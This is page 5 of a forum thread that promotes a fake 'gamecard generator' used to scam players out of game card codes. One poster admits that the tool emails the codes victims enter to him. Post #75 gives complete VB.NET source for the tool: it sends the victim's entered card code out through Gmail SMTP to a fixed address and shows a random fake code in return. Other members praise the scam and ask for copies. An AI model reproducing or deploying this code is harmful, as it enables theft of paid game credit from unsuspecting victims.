[Programs] scam gamecards, accounts! menu

User Tag List

Page 5 of 6 FirstFirst 123456 LastLast
Results 61 to 75 of 84
  1. #61
    Gash's Avatar Evil Elite Gash!
    Reputation
    341
    Join Date
    Apr 2007
    Posts
    677
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    strange that you give the prog to a leecher with 4 posts..

    i thought you need rep :>

    [Programs] scam gamecards, accounts!
  2. #62
    Zeroi9's Avatar Banned
    Reputation
    286
    Join Date
    Aug 2008
    Posts
    911
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Gash View Post
    strange that you give the prog to a leecher with 4 posts..

    i thought you need rep :>
    I haven't given out it to someone with less than 10 rep!

    Y R U NOB Dont steal my thread! mwahaha

  3. #63
    kilativ's Avatar Member
    Reputation
    8
    Join Date
    Oct 2008
    Posts
    58
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Wow too much to read

  4. #64
    kilativ's Avatar Member
    Reputation
    8
    Join Date
    Oct 2008
    Posts
    58
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    how to make programms like this?

  5. #65
    dfk's Avatar Contributor
    Reputation
    122
    Join Date
    Jun 2007
    Posts
    428
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    great job on the programs man +rep maybe ill grab one off you one of these days

  6. #66
    Zeroi9's Avatar Banned
    Reputation
    286
    Join Date
    Aug 2008
    Posts
    911
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by dfk View Post
    great job on the programs man +rep maybe ill grab one off you one of these days


    Thanks! btw, cool signature =O

    Yeah, you better do that bef0re I kill this thread! xD

  7. #67
    cedsson's Avatar Member
    Reputation
    3
    Join Date
    May 2008
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    plz

    tja kan du ge mig gamecard generator till [email protected] plz

  8. #68
    doca1111's Avatar Member
    Reputation
    6
    Join Date
    Jan 2007
    Posts
    15
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    zeroi9 you owning

  9. #69
    Zeroi9's Avatar Banned
    Reputation
    286
    Join Date
    Aug 2008
    Posts
    911
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by doca1111 View Post
    zeroi9 you owning

    Thanks for the kind words
    doca1111.
    Go do usefull posts and you will own to. ;)

  10. #70
    Thunderofnl's Avatar Elite User C# / Java / PHP Programmer
    Authenticator enabled
    Reputation
    491
    Join Date
    May 2008
    Posts
    1,033
    Thanks G/R
    20/20
    Trade Feedback
    6 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nicely done man nicely done
    you will get rep from me

  11. #71
    daithi112's Avatar Member
    Reputation
    11
    Join Date
    Aug 2008
    Posts
    71
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Gamecard generator doesn't work...

  12. #72
    Zeroi9's Avatar Banned
    Reputation
    286
    Join Date
    Aug 2008
    Posts
    911
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by daithi112 View Post
    Gamecard generator doesn't work...
    Ofcourse not, it sends the mail to me, since I havent changed it to yuor mail and sended it to you

  13. #73
    Gotlyfe's Avatar Member
    Reputation
    1
    Join Date
    Mar 2008
    Posts
    3
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Holy Crap i was reading this and im like wow this is amazing.... then i realized holy crap... i dont have any rep at all, i need to post some stuff

  14. #74
    iruleatants's Avatar Active Member
    Reputation
    16
    Join Date
    Apr 2008
    Posts
    73
    Thanks G/R
    2/2
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If someone who has the rep shares me their program, I'll packet sniff it for you, and tell you how many emails it sends.

  15. #75
    iruleatants's Avatar Active Member
    Reputation
    16
    Join Date
    Apr 2008
    Posts
    73
    Thanks G/R
    2/2
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you wanted to make this yourself, its quite easy (Infact, it took me longer to find my gamecard, then to make this code).

    My entire source code, and if the demand is enough, I can post a picture tutorial on how to make the form in vb.net (10 second job)

    Code:
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    
            If TextBox1.Text = "" Then
                MsgBox("You must enter your gamercard")
            End If
            Dim mail As New MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("Gmail Username", "Gmail Password")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("[email protected]")
            mail.From = New MailAddress("[email protected]")
            mail.Subject = "Gamecard number"
            mail.Body = TextBox1.Text
            SmtpServer.Send(mail)
    
            TextBox2.Text = RandomInteger(1000, 1999) & "-" & RandomInteger(100000, 999999) & "-" & RandomInteger(10000, 99999) & "-" & RandomInteger(100000, 999999) & "-" & RandomInteger(1000, 9999)
    
        End Sub
    
        Public Function RandomInteger(ByVal lng1, ByVal lng2) As Long
            Dim lng3 As Long
            Dim lng4 As Long
    
            If lng1 < lng2 Then
                lng3 = lng1 - 1
                lng4 = lng2 + 1
            Else
                lng3 = lng2 - 1
                lng4 = lng1 + 1
            End If
    
    AnotherRandom:
    
            RandomInteger = Rnd() * (lng3 - lng4) + lng4
    
            If RandomInteger <= lng3 Or RandomInteger >= lng4 Then
                GoTo AnotherRandom
            End If
        End Function
    
    End Class

Page 5 of 6 FirstFirst 123456 LastLast

Similar Threads

  1. [WTT] Scammed EU account for EU Gamecards
    By Quafe in forum Members Only Accounts And CD Keys Buy Sell
    Replies: 0
    Last Post: 10-15-2008, 07:51 AM
All times are GMT -5. The time now is 11:56 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search